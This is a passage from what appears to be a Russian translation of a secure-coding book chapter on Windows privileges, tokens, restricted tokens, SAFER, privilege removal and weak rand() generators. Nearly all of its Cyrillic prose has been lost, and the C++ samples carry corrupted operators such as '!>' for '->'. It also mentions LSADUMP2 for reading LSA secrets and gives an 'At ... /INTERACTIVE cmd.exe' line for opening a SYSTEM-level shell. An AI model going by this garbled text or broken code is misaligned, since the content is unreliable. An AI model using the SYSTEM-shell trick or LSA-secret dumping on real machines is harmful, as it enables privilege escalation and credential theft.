, FILE_FLAG_BACKUP_SEMANTICS.
SeBackupPrivilege . ,
SeBackupPrivilege SeRestorePrivilege, 
. NTBackup.exe,
, ACL,
, .
SeBackupPrivilege .
, :
; 
, .

SeRestorePrivilege
, 
. , DLL EXE
, ! ,
, 
.

SeDebugPrivilege
Debug Programs
,
. , 

. 9.
,
SSL/TLS,
, nCipher (http://www.ncipher.com).
, TerminateProcess
Debug Programs . , ,
, ,
, Lsass.exe, 
(Local Security Authority, LSA).
!
, CreateRemote
Thread
. 
LSADUMP2 (http://razor.bindview.com/tools): 
LSA.

185

Lsass.exe ,
, .
LSA 9.

(Jeffrey Richter) Programming Applications for Microsoft Windows
(Microsoft Press) ( . Windows : 
Win32 64 Windows. .:
; .: , 2001).
, 
Debug Programs ,
.
. , Blake 
, ,
Cheryl.

SeTcbPrivilege
Act as part of the operating system [
Trusted Computing Base (TCB)] 
.
Windows.
SYSTEM.
! TCB, 
. , , ,
.

TCB 
LogonUser,
. , Windows XP, LogonUser
Windows
.
Passport GroupSid NULL.

SeAssignPrimaryTokenPrivilege
SeIncreaseQuotaPrivilege
Replace A Process Level Token Increase Quotas

(spoofing)
.

SeLoadDriverPrivilege

, .

186

II

SeLoadDriverPrivilege,
. 
,
.
, (Plug and Play) 
Plug and Play.

SeRemoteShutdownPrivilege
.
: ,
. , 
, Everyone ()
! DS (Denial of Service)
!

SeTakeOwnershipPrivilege
Windows NT/2000/XP (owner).
( ), 
, . 
,
.
, Windows XP , 
, 
. Windows XP , Windows
.NET Server 2003, 
Administrators (),
.

Bypass Traverse Checking ( ),


SeChangeNotifyPrivilege ,
. 
. , 
,

Windows .
NTFS.


Windows NT/2000/XP 
(token),

. SID , SID
, , . 

187

, 
. , 
. 
(,
) .
Windows 2000, 
SID . 
(restricted token). , 
.

, ,
SID, ACL
Microsoft Windows NT/2000/XP 
, , .
. 

, CreateProcessAsUser. , ,
CreateProcessAsUser, SeAssignPri
maryTokenPrivilege SeIncreasQuotaPrivilege. , ,
, 
, SeAssignPrimaryTokenPrivilege .
, 
(Service Control Manager, SCM). 
Local System, 
,
SCM (. 71).

. 71.

SCM

LSA.
LSA 9.

188

II

, 
, 
, 
, . 
, 
, .

SID ,

SID .
ACL, .
, ,
, 
. , 
, .
? : 
. 
, SID .
, .
, ,
SID .



, ,
, ,
. , , ,
, :
,  ACL;
,  ;
LSA.
, 
.

ACL
NTFS ACL:
SYSTEM Full Control ( );
Administrators () Full Control ( );
Everyone () Read ().
,
, (
/
). : 5!

189

: ,
, ,
.
C:\Program Files? : .
, 
. ,
.
!
, 
. ! Game Over!

GENERIC_ALL
, ACL,
, , . ACL
GENERIC_ALL.
?
SYSTEM. GENERIC_ALL Full Control
( ). , 
. , 
. GENERIC_ALL? , .
GENERIC_READ,
, ACL Read
() Everyone (). 
: ,
, , 
( ACE)
.
: Windows NT/2000/XP 
, . 
, ACL ,

.
, 
dwDesiredAccess MAXIMUM_ALLOWED, 
, .


,
. :

, 
. .

LSA
LSA . 
LSA API LsaStorePrivateData LsaRetrievePrivateData.

190

II

, LSA
. Platform SDK LsaStore
PrivateData: , DACL 
. , LSA
,  , 

.

,
-
( ),

.

ACL
ACL:
;
,
;
ACL .
, , 
. , 
. ,
.
:
, HKEY_LOCAL_MACHINE,
C:\Program Files ( ,
%PROGRAMFILES%) C:\Winnt (%SYSTEMROOT%). 
HKEY_CURRENT_USER,
. 
:

#include "shlobj.h"
...
TCHAR szPath[MAX_PATH];
...
if (SUCCEEDED(SHGetFolderPath(NULL, CSIDL_PERSONAL NULL, 0, szPath)) {
HANDLE hFile = CreateFile(szPath, ...);
M
}

, , 
,
, . 
:
.

191

, 
(ACL) ,
. , ,
ACL . 
.


, 
, , .
, ,
! ,
, .

LSA
Windows 2000/XP API (Data Protection API, DPAPI).
,
,
, 
.

DPAPI 9.


6, ACL
ACE. SID .
, SID
. 
.
( ),
SID , .
1. , .
2. API, .
3. , .
4. , SID .
5. , SID .
6. .

1: ,
, 
: , , , Active Directory,
. ., ,
. , Windows
, , 
. 72.

192

II

7-2.

, -


. 

2: ,
API-
,
(. 73).

7-3.

Windows

CreateFile () c
FILE_FLAG_BACKUP_SEMANTICS

SeBackupPrivilege

LogonUser

SeTcbPrivilege ( Windows XP
Windows .NET Server 2003
)

SetTokenInformation

SeTcbPrivilege

ExitWindowsEx

SeShutdownPrivilege

OpenEventLog

SeSecurityPrivilege

BroadcastSystemMessage[Ex]

(BSM_ALLDESKTOPS)

SeTcbPrivilege

SendMessage PostMessage

SeTcbPrivilege

RegisterLogonProcess

SeTcbPrivilege

InitiateSystemShutdown[Ex]

SeShutdownPrivilege
SeRemoteShutdownPrivilege

SetSystemPowerState

SeShutdownPrivilege

GetFileSecurity

SeSecurityPrivilege

7-3.

193

()

,
DebugActiveProcess
ReadProcessMemory

SeDebugPrivilege

CreateProcessAsUser

SeIncreaseQuotaPrivilege
SeAssignPrimaryTokenPrivilege

CreatePrivateObjectSecurityEx

SeSecurityPrivilege

SetSystemTime

SeSystemtimePrivilege

VirtualLock AllocateUserPhysicalPages

SeLockMemoryPrivilege


,
NetUserAdd NetLocalGroupDel


,
Administrators ()
Account Operators ( )

NetJoinDomain

SeMachineAccountPrivilege

, Windows
 (wrappers) COM.
, , , ,
Windows.

3: ,
, .
,
.
 , 
.
. 
: 
!

4:
, SID ,
.
, RunAs
. , 
:

RunAs /user:MyMachine\Administrator cmd.exe

194

II

( ) 
, , 
, .
, ,
SYSTEM,
. ,
17:01,
, :

At 17:02 /INTERACTIVE "cmd.exe"


Local
System.
, , ,
MyToken.cpp. 
.

/*
MyToken.cpp
*/
#define SECURITY_WIN32
#include "windows.h"
#include "security.h"
#include "strsafe.h"
#define MAX_NAME 256
//
// . .
LPVOID AllocateTokenInfoBuffer(
HANDLE hToken,
TOKEN_INFORMATION_CLASS InfoClass,
DWORD *dwSize) {
*dwSize=0;
GetTokenInformation(
hToken,
InfoClass,
NULL,
*dwSize, dwSize);
return new BYTE[*dwSize];
}
// () .
void GetUserNames() {
EXTENDED_NAME_FORMAT enf[] = {NameDisplay,
NameSamCompatible,NameUserPrincipal};
for (int i=0; i < sizeof(enf) / sizeof(enf[0]); i++) {
char szName[128];
DWORD cbName = sizeof(szName);
if (GetUserNameEx(enf[i],szName,&cbName))

printf(" (format %d): %s\n",enf[i],szName);


}
}
// SID SID.
void GetAllSIDs(HANDLE hToken, TOKEN_INFORMATION_CLASS tic) {
DWORD dwSize = 0;
TOKEN_GROUPS *pSIDInfo = (PTOKEN_GROUPS)
AllocateTokenInfoBuffer(
hToken,
tic,
&dwSize);
if (!pSIDInfo) return;
if (!GetTokenInformation(hToken, tic, pSIDInfo, dwSize, &dwSize))
printf("GetTokenInformation Error %u\n", GetLastError());
if (!pSIDInfo!>GroupCount)
printf("\t!\n");
for (DWORD i=0; i < pSIDInfo!>GroupCount; i++) {
SID_NAME_USE SidType;
char lpName[MAX_NAME];
char lpDomain[MAX_NAME];
DWORD dwNameSize = MAX_NAME;
DWORD dwDomainSize = MAX_NAME;
DWORD dwAttr = 0;
if (!LookupAccountSid(
NULL,
pSIDInfo!>Groups[i].Sid,
lpName, &dwNameSize,
lpDomain, &dwDomainSize,
&SidType)) {
if (GetLastError() == ERROR_NONE_MAPPED)
StringCbCopy(lpName, sizeof(lpName), "NONE_MAPPED");
else
printf("LookupAccountSid Error %u\n", GetLastError());
} else
dwAttr = pSIDInfo!>Groups[i].Attributes;
printf(%12s\\%!20s\t%s\n",
lpDomain, lpName,
(dwAttr & SE_GROUP_USE_FOR_DENY_ONLY) ? " [DENY]" : " ");
}
delete [] (LPBYTE) pSIDInfo;
}
// .

195

196

II

void GetPrivs(HANDLE hToken) {


DWORD dwSize = 0;
TOKEN_PRIVILEGES *pPrivileges = (PTOKEN_PRIVILEGES)
AllocateTokenInfoBuffer(hToken,
TokenPrivileges, &dwSize);
if (!pPrivileges) return;
BOOL bRes = GetTokenInformation(
hToken,
TokenPrivileges,
pPrivileges,
dwSize, &dwSize);
if (FALSE == bRes)
printf("GetTokenInformation \n");
for (DWORD i=0; i < pPrivileges! >PrivilegeCount; i++) {
char szPrivilegeName[128];
DWORD dwPrivilegeNameLength=sizeof(szPrivilegeName);
if (LookupPrivilegeName(NULL,
&pPrivileges!>Privileges[i].Luid,
szPrivilegeName,
&dwPrivilegeNameLength))
printf("\t%s (%lu)\n",
szPrivilegeName,
pPrivileges!>Privileges[i].Attributes);
else
printf("LookupPrivilegeName ! %lu\n",
GetLastError());
}
delete [] (LPBYTE) pPrivileges;
}
int wmain( ) {
if (!ImpersonateSelf(SecurityImpersonation)) {
printf("ImpersonateSelf Error %u\n", GetLastError());
return !1;
}
HANDLE hToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&hToken)) {
printf("OpenThreadToken Error %u\n", GetLastError());
return !1;
}
printf("\nUser Name\n");
GetUserNames();

197

printf("\nSIDS\n");
GetAllSIDs(hToken,TokenGroups);
printf("\nRestricting SIDS\n");
GetAllSIDs(hToken,TokenRestrictedSids);
printf("\nPrivileges\n");
GetPrivs(hToken);
RevertToSelf();
CloseHandle(hToken);
return 0;
}
MyToken.cpp Secureco2\Chapter07
. 
, SID, SID .
GetUser, GetAllSIDs GetPrivs.
GetAllSIDs: SID. 
( ) 
. 
, , SID 
( [DENY]).

, 
, OpenProcessToken.

, Token Master 
(Jeffrey Richter) (Jason Clark) Programming ServerSide
Applications for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
Microsoft Windows 2000. .:
; .: , 2001) 
. Token Master
,

(. 72).
Token Information SID ,
SID .  
. , MyToken.cpp
:

User
SIDS

NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
BUILTIN\Users

198

II

NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
Privileges
SeChangeNotifyPrivilege (3)
SeSecurityPrivilege (0)
SeBackupPrivilege (0)
SeRestorePrivilege (0)
SeSystemtimePrivilege (0)
SeShutdownPrivilege (0)
SeRemoteShutdownPrivilege (0)
SeTakeOwnershipPrivilege (0)
SeDebugPrivilege (0)
SeSystemEnvironmentPrivilege (0)
SeSystemProfilePrivilege (0)
SeProfileSingleProcessPrivilege (0)
SeIncreaseBasePriorityPrivilege (0)
SeLoadDriverPrivilege (2)
SeCreatePagefilePrivilege (0)
SeIncreaseQuotaPrivilege (0)
SeUndockPrivilege (2)
SeManageVolumePrivilege (0)

. 72. Cmd.exe,
SYSTEM

199


, . 74.

7-4.

SE_PRIVILEGE_USED_FOR_ACCESS

0x80000000

SE_PRIVILEGE_ENABLED_BY_DEFAULT

0x00000001

SE_PRIVILEGE_ENABLED

0x00000002

5:
SID-
: ,
SID ,
, .
, 1 2, 4
. SID , 
, .
SID, Users
() Everyone (), .
.
ACL,
, !
,
, .
.

6:
. 
:
, 
, ;
(restricted tokens);
.
.



,
. , 95% 
, .

200

II

, 
, Windows
PrivilegeCheck.
, ,
.

! , 
, 
. 
 , .

. , 
, 
. : 

.

. 
,
.
 Web, SYSTEM,

. ,
, 
SYSTEM. , 
, 
:
;
Windows
;

. , 
!

.
, .
, 
. SYSTEM 
, 
, 
SYSTEM. ( , )
RevertToSelf,
, SYSTEM. 
, RevertToSelf 

201

. , , IIS 5. Web
, , [ 
(High) (Medium) ]. 
IWAM_<_>.
IIS [ (Low) 
], SYSTEM. 
, 
,
. , IIS 6
, SYSTEM, , 
SYSTEM Web, .


Windows 2000/XP . 
(restricted) ,
CreateRestictedToken. 

, ,
. CreateRestictedToken
:
;
SID (restricting SID);
SID (deny
only attribute).


:
. .

SID
, 
SID. 
,
SID , 
.
SID. ACL
Everyone () , Administrators ()
, . .

, . 
Brian, . 
:
Everyone ();
Authenticated Users ( );
Administrators ();
Marketing.

202

II

,
()
Everyone. 
. Brian
, , 
, SID. (
Administrators, ), . 
SID, SID Everyone
, Everyone
.
SID, 
, (AND)
SID, .

SID.

SID
(denyonly SID) 
.
. ACL Marketing ACE Deny:
Full Controll (: ), SID
Marketing, . ACE
Marketing Allow: Read (: ), SID
Marketing ,
.
, , , . 75 
.

7-5.

SID ACL
ACL

Marketing
Allow: Read

ACL

Marketing
Deny: Full Control


SID
Marketing


ACE



SID Marketing


ACE

ACL

ACE-
Marketing

: SID
, SID
. . ACL
Marketing. SID Marketing 
, , , , 

203

! SID
.


, 
.
,
SID , .
, ,
SID . 
Windows 2000/XP .
,
, SID. , 
Authenticated
Users, SID Authenticated Users.
, ,
( ).
,
,
. : (, )
( ).
ShellExecute CreateProcess 
, .

-,
CreateProcessAsUser,
.
ImpersonateLoggedOnUser SetThreadToken , 

.
, ,
: , SeChange
NotifyPrivilege ( ).
DISABLE_MAX_PRIVILEGE,
, SID
.

/*
Restrict.cpp
*/
// SID BUILTIN\Administrators.
BYTE sidBuffer[256];
PSID pAdminSID = (PSID)sidBuffer;
SID_IDENTIFIER_AUTHORITY SIDAuth = SECURITY_NT_AUTHORITY;
If (!AllocateAndInitializeSid( &SIDAuth, 2,
SECURITY_BUILTIN_DOMAIN_RID ,

204

II

DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,
&pAdminSID) ) {
printf("AllocateAndInitializeSid Error %u\n", GetLastError() );
return !1;
}
// SID SID.
SID_AND_ATTRIBUTES SidToDisable[1];
SidToDisable[0].Sid = pAdminSID;
SidToDisable[0].Attributes = 0;
// .
HANDLE hOldToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_ADJUST_DEFAULT,
&hOldToken)) {
printf("OpenProcessToken (%lu)\n", GetLastError() );
return !1;
}
// .
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hOldToken,
DISABLE_MAX_PRIVILEGE,
1, SidToDisable,
0, NULL,
0, NULL,
&hNewToken)) {
printf("CreateRestrictedToken (%lu)\n", GetLastError() );
return !1;
}
if (pAdminSID)
FreeSid(pAdminSID);
//
// .
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO) );
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
// Cmd.exe, ,
// "" Cmd.exe.
char szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir,MAX_PATH)) {
char szCmd[MAX_PATH+1];
if (StringCchCopy(szCmd,MAX_PATH,szSysDir) == S_OK &&

205

StringCchCat(szCmd,MAX_PATH,"\\") == S_OK &&


StringCchCat(szCmd,MAX_PATH,"cmd.exe") == S_OK) {
if(!CreateProcessAsUser(
hNewToken,
szCmd, NULL,
NULL,NULL,
FALSE, CREATE_NEW_CONSOLE,
NULL, NULL,
&si,&pi))
printf("CreateProcessAsUser (%lu)\n",
GetLastError() );
}
}
CloseHandle(hOldToken);
CloseHandle(hNewToken);
return 0;

SID . IsTokenResticted ,
.

! Restrict.cpp STARTUPINFO.IpDesktop ( 
NULL) winsta0\\default.
(Terminal Server)
, Terminal Server,
.
Secureco2\Chapter07.


.

( MyToken.cpp),
. , SID Administrators 
(denyonly), , SeChangeNotifyPrivilege, .

User
SIDS

NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
[DENY]
BUILTIN\Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users

Restricting SIDS
None

206

II

Privileges
SeChangeNotifyPrivilege (3)
, . 
. 
. 
ThreadFunc; ,
Bypass Traverse hecking, DoThreadWork.

#include <windows.h>
DWORD WINAPI ThreadFunc(LPVOID lpParam) {
DWORD dwErr = 0;
try {
if (!ImpersonateSelf(SecurityImpersonation))
throw GetLastError();
HANDLE hToken = NULL;
HANDLE hThread = GetCurrentThread();
if (!OpenThreadToken(hThread,
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_IMPERSONATE,
TRUE,
&hToken))
throw GetLastError();
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hToken,
DISABLE_MAX_PRIVILEGE,
0, NULL,
0, NULL,
0, NULL,
&hNewToken))
throw GetLastError();
if (!SetThreadToken(&hThread, hNewToken))
throw GetLastError();
// DoThreadWork "" .
DoThreadWork(hNewToken);
} catch(DWORD d) {
dwErr = d;
}
if (dwErr == 0)
RevertToSelf();
return dwErr;
}

207

void main() {
HANDLE h = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)ThreadFunc,
NULL, CREATE_SUSPENDED, NULL);
if (h)
ResumeThread(h);
}

Windows XP
Windows XP Software Restriction
Policies ( ), SAFER, 
. 
SAFER, . 
SAFER 
Windows XP, Software Restriction Policies ( 
).
SAFER ( Winsafer.h), 
. SaferCompute
TokenFromLevel. , ,
.

NormalUser, , Administrators
(), Power Users ( ).
Secureco2\Chapter07. MyTo
ken.cpp SID .

/*
SAFER.cpp
*/
#include <windows.h>
#include <WinSafer.h>
#include <winnt.h>
#include <stdio.h>
#include <strsafe.h>
void main() {
SAFER_LEVEL_HANDLE hAuthzLevel;
//
//
//
//
//
//


SAFER_LEVELID_FULLYTRUSTED
SAFER_LEVELID_NORMALUSER
SAFER_LEVELID_CONSTRAINED
SAFER_LEVELID_UNTRUSTED
SAFER_LEVELID_DISALLOWED

SAFER:
( )
()
()
()
()

// .
if (SaferCreateLevel(SAFER_SCOPEID_USER,
SAFER_LEVELID_NORMALUSER,
0, &hAuthzLevel, NULL)) {

208

II

// .
HANDLE hToken = NULL;
if (SaferComputeTokenFromLevel(
hAuthzLevel, // .
NULL,
// NULL.
&hToken,
// .
0,
// .
NULL)) {
// .
// Cmd.exe , ,
// "" Cmd.exe
char szPath[MAX_PATH+1], szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir, sizeof (szSysDir))) {
StringCbPrintf(szPath,
sizeof (szPath),
"%s\\cmd.exe",
szSysDir);
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
PROCESS_INFORMATION pi;
if (!CreateProcessAsUser(
hToken,
szPath, NULL,
NULL, NULL,
FALSE, CREATE_NEW_CONSOLE,
NULL, NULL,
&si, &pi))
printf("CreateProcessAsUser (%lu)\n",
GetLastError() );
}
}
SaferCloseLevel(hAuthzLevel);
}
}
SAFER 

. SAFER,
, ,
. 
 
. ,
,
,
SAFER.

209


Windows Security Push ( Microsoft 
, ) 
Windows .Net Server 2003 
. SAFER:
, 
. ,
: , .
, 
. 
.

// RemPriv
#ifndef SE_PRIVILEGE_REMOVED
#define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
DWORD RemovePrivs(LPCTSTR szPrivs[], DWORD cPrivs) {
HANDLE hProcessToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hProcessToken))
return GetLastError();
DWORD cbBuff = sizeof TOKEN_PRIVILEGES +
(sizeof LUID_AND_ATTRIBUTES * cPrivs);
char *pbBuff = new char[cbBuff];
PTOKEN_PRIVILEGES pTokPrivs = (PTOKEN_PRIVILEGES)pbBuff;
// .
pTokPrivs!>PrivilegeCount = cPrivs;
for (DWORD i=0; i < cPrivs; i++) {
LookupPrivilegeValue(NULL,szPrivs[i],
&(pTokPrivs!>Privileges[i].Luid));
pTokPrivs!>Privileges[i].Attributes = SE_PRIVILEGE_REMOVED;
}
// .
BOOL fRet = AdjustTokenPrivileges(hProcessToken,
FALSE,
pTokPrivs,
0,
NULL,
NULL);
DWORD dwErr = GetLastError();
#ifdef _DEBUG
printf("AdjustTokenPrivileges() !> %d\nGetLastError() !> %d\n",
fRet,

210

II

dwErr);
#endif
if (pbBuff) delete [] pbBuff;
CloseHandle(hProcessToken);
return dwErr;
}
int main(int argc, CHAR* argv[]) {
LPCTSTR szPrivs[] = {SE_TAKE_OWNERSHIP_NAME, SE_DEBUG_NAME};
if (RemovePrivs(szPrivs,
sizeof(szPrivs)/sizeof(szPrivs[0])) == 0) {
// ! !
}
}
AdjustTokenPrivileges, , 
SE_PRIVILIGE_REMOVED. :
,
. 
,
.
Windows .NET Server 2003 ,
, .
, Win
dows .NET Server 2003, GetVer
sionEx .
, Windows .NET Server 2003 LSA (LSASS.EXE) 
, :
SeTakeOwnershipPrivilege;
SeCreatePagefilePrivilege;
SeLockMemoryPrivilege;
SeAssignPrimaryTokenPrivilege;
SeIncreaseQuotaPrivilege;
SeIncreaseBasePriorityPrivilege;
SeCreatePermanentPrivilege;
SeSystemEnvironmentPrivilege;
SeUndockPrivilege;
SeLoadDriverPrivilege;
SeProfileSingleProcessPrivilege;
SeManageVolumePrivilege.
Smartcard :
SeSecurityPrivilege;
SeSystemtimePrivilege;
SeDebugPrivilege;
SeShutdownPrivilege;
SeUndockPrivilege.

211

, ,
SeChangeNotifyPrivilege, NTFS.
:

/*
JettisonPrivs.cpp
*/
#ifndef SE_PRIVILEGE_REMOVED
# define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
#define SAME_LUID(luid1,luid2) \
(luid1.LowPart == luid2.LowPart && \
luid1.HighPart == luid2.HighPart)
DWORD JettisonPrivs() {
DWORD dwError = 0;
VOID* TokenInfo = NULL;
try {
HANDLE hToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&hToken))
throw GetLastError();
DWORD dwSize=0;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
NULL, 0,
&dwSize)) {
dwError = GetLastError();
if (dwError != ERROR_INSUFFICIENT_BUFFER)
throw dwError;
}
TokenInfo = new char[dwSize];
if (NULL == TokenInfo)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
TokenInfo, dwSize,
&dwSize))
throw GetLastError();

212

II

TOKEN_PRIVILEGES* pTokenPrivs = (TOKEN_PRIVILEGES*) TokenInfo;


// .
LUID luidChangeNotify;
LookupPrivilegeValue(NULL,SE_CHANGE_NOTIFY_NAME,
&luidChangeNotify);
for (DWORD dwIndex = 0;
dwIndex < pTokenPrivs!>PrivilegeCount;
dwIndex++)
if (!SAME_LUID (pTokenPrivs!>Privileges[dwIndex].Luid,
luidChangeNotify))
pTokenPrivs!>Privileges[dwIndex].Attributes =
SE_PRIVILEGE_REMOVED;
if (!AdjustTokenPrivileges(
hToken,
FALSE,
pTokenPrivs, dwSize,
NULL, NULL))
throw GetLastError();
} catch (DWORD err) {
dwError = err;
}
if (TokenInfo)
delete [] TokenInfo;
return dwError;
}


Windows XP/.NET Server 2003
Windows
, . 

, 
. (
SeTcbPrivilege, SID SYSTEM SID 
), : ,
.
, 
. Windows XP
:
(NT AUTHORITY\LocalService);
(NT AUTHORITY\NetworkService).

213


. 
,
.
. , BlakeLaptop
LocalService ,
, (
). , ( )
, . 
BlakeLaptop NetworkService, 
BLAKELAPTOP$.
: Windows 2000/XP 
,
$.
ACL ,
.
. 76 , 
Windows .NET Server 2003.

7-6.

SeCreateTokenPrivilege

SeAssignPrimaryTokenPrivilege

SeLockMemoryPrivilege

SeIncreaseQuotaPrivilege

SeMachineAccountPrivilege
SeTcbPrivilege

SeSecurityPrivilege

SeTakeOwnershipPrivilege

SeLoadDriverPrivilege

SeSystemProfilePrivilege
SeSystemtimePrivilege

SeProfileSingleProcessPrivilege

SeIncreaseBasePriorityPrivilege

SeCreatePagefilePrivilege

SeCreatePermanentPrivilege

SeBackupPrivilege

SeRestorePrivilege

SeShutdownPrivilege

SeDebugPrivilege

SeAuditPrivilege

SeSystemEnvironmentPrivilege

. . .

214

II

()

7-6.

SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege

, Local System  ,
.
? 
: NetworkService
, LocalService ,
,
.
! Local System, 
, 
,
NetworkService LocalService.

Windows .NET Server 2003


(impersonation) 
, c .
,
. 

. , Windows .NET
Server 2003 SeImpersonatePrivilege (. 77).

7-7.

#define

SE_IMPERSONATE_NAME

SeImpersonatePrivilege

29L

SID :
SYSTEM;
Administrators ();
Service ().
Everyone , Service ,
.

, .
, 
.

215

, 
(, RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELEGATE).
(
, RPC_C_IMP_LEVEL_ANONYMOUS RPC_C_IMP_LEVEL_IDENTIFY). ,
, ,
. 
, .

,
-
,
.
,

. 
,
, , , .
:
Windows 95/98/Me, 
Windows NT/2000/XP,
;
, ,
.
. Microsoft Windows XP
, , 
, 
. , 
ACL ,
Windows XP, Windows 95/98/Me (
).
,
 , 
.


, Windows 95/98/Me, 
Windows NT/2000/XP. 
, 
. , ,
, . , 
, ,
. , , , 
.
.
Unable to load (

216

II

), , 
. , 
. : 
Windows Me, Windows XP 

.  ,
, , 
, !
C:\Program Files.
,
, .
! , 
.
.

,

:
Event Viewer ( );
RegMon ( http://www.sysinternals.com);
FileMon ( http://www.sysinternals.com).

Windows
,
. 
.
, 
, . ,

, . Windows 2000/XP
.
1. Mmc.exe.
2. Console1 (1) File (),
Add/Remove Snapin ( ).
3. Add/Remove Snapin ( ) 
Add () Add Standalone Snapin (
).
4. Group Policy ( ) Add
().
5. Select Group Policy Object ( )
Finish (). Select Group Policy Object (
) Local Computer ( 
).

217

6. Add Standalone Snapin ( )..


7. Add/Remove snapin ( ), 
OK.
8. Local Computer Policy\Computer Configuration\Windows set
tings\Security Settings\Local Policies\Audit Policy ( 
\ \ Windows\ 
\ \ ).
9. Audit Privilege Use ( ),
Audit Privilege Use Properties (:
).
10. Success () Failure () OK.
11. . (, 
.)
, 
Windows, ,
:

Event Type:
Failure Audit
Event Source:
Security
Event Category: Privilege Use
Event ID:
578
Date:
5/21/2002
Time:
10:15:00 AM
User:
NORTHWINDTRADERS\blake
Computer:
CHERYL!LAP
Description:
Privileged object operation:
Object Server:
Security
Object Handle:
0
Process ID:
444
Primary User Name: BLAKE!LAP$
Primary Domain:
NORTHWINDTRADERS
Primary Logon ID: (0x0,0x3E7)
Client User Name: blake
Client Domain:
NORTHWINDTRADERS
Client Logon ID:
(0x0,0x485A5)
Privileges:
SeShutdownPrivilege
Blake , 
. , 
.

Regmon FileMon

.
: RegMon FileMon. http://www.sysinternals.com.
ACCDENIED
, ,

218

II

, 
.
FAT FAT32
. 
NTFS, FAT, 
, . FileMon 
, . ,
FAT? , GetFileSecurity SetFileSecurity 
FAT, . ,

, FAT.
RegMon FileMon
. , 
, .
 . 73, 74 75 (. 219221) , 
, 
.
!
.
SYS
TEM . , 
?


. 

. : , .
, 
, , .
, 
.

SYSTEM .
, : 
, 
, ,
.
 ,
.
: ,
, 
.

219


.

,

. 7-4
(-
)

. 73. ,

220

II

RegMon

RegMon

:
,

ACL
.

RegMon


RegMon


RegMon

?


Full Control
Everyone

. 7-5
(-
)

. 74. ,

221

NTFS?

, ,
?

:


FileMon

FileMon

:
,

ACL
.

FileMon


FileMon
?



Full Control Everyone

,
,

,

?

,

?

. 75. ,

: ,
. :
, ,
, . ,

. , !
, .
, 
, 
.
, 
, 
, , 

. 
, 
.
, , 
.
: .


, (nonce) 
.

223

.
, .
, ,
, . 
, 
.

rand
C++,
rand C. , 
C .
rand ,
. rand Rand.c 
Microsoft Visual C++ 7 (C Runtime, CRT), (
):

int __cdecl rand (void) {


return(((holdrand =
holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}
(Brian Kernighan)
(Dennis Ritchie) The C Programming Language, Second Edition (Prentice
Hall PTR, 1988)* :

unsigned long int next = 1;


int rand(void)
{
next = next * 1103515245 + 12345;
return (unsigned int)(next/65536) % 32768;
}

(linear congruential function). 
: 
,
(
, ).
, 
! , rand ,
! 
. 
(Donald Knuth) The Art of Computer Programming,
Volume 2: Seminumerical Algorithms (AddisonWesley, 1998) ( . 
. 2. ; .: ).
rand :


. .

224

II

VBScript
73 22 29 92 19 89 43 29 99 95
: VBScript.
Randomize 4269
For i = 0 to 9
r = Int(100 * Rnd) + 1
WScript.echo(r)
Next
// C/C++
// 52 4 26 66 26 62 2 76 67 66
#include <stdlib.h>
void main() {
srand(12366);
for (int i = 0; i < 10; i++) {
int i = rand() % 100;
printf("%d ", i);
}
}
# Perl 5
# 86 39 24 33 80 85 92 64 27 82
srand 650903;
for (1 .. 10) {
$r = int rand 100;
printf "$r ";
}
// C#
// 39 89 31 94 33 94 80 52 64 31
using System;
class RandTest {
static void Main() {
Random rnd = new Random(1234);
for (int i = 0; i < 10; i++) {
Console.WriteLine(rnd.Next(100));
}
}
}
, . (, , 
,
.)
! ,
CRT rand, , . 
,
.

225

, , 
, Netscape Navigator.
: , 
SSL (Secure Sockets Layer), 
, SSL.
, !
BugTraq http://online.securityfocus.com/
archive/1/3791.
. , IP
CodeRed .
IP. ,
, , ,
! Web http://www.avp.ch/avpve/worms/iis/
bady.stm.

Texas Hold Em Poker ASF Software.
Reliable Software Technologies ( Cigital http://www.cigital.com)
1999 . 
Borland Delphi 
, rand CRT. Exploit ,
! Web
http://www.cigital.com/news/gambling.html.

Win32
: rand,
Windows, 
CryptGenRandom,
.
WinCrypt.h Windows
, Windows 95 Internet Explorer 3.02
, Windows 98, Windows Me, Windows CE v3, Windows NT 4/2000/XP Win
dows .NET Server 2003.
CryptGenRandom
. 81.
, , , 
, FIPS 1862, 3.1, SHA1,
G.
CryptGenRandom [ 
(system entropy)], Windows 2000
, :
(GetCurrentProcessID);
(GetCurrentThreadID);
(GetTickCount);
(GetLocalTime);

226

II

CryptGenRandom()

FIPS 186
,
SHA-1

NewGenRandom()

64

RC4

MD4

SHA-1 x 4

RC4

HKLM/Software/Microsoft/
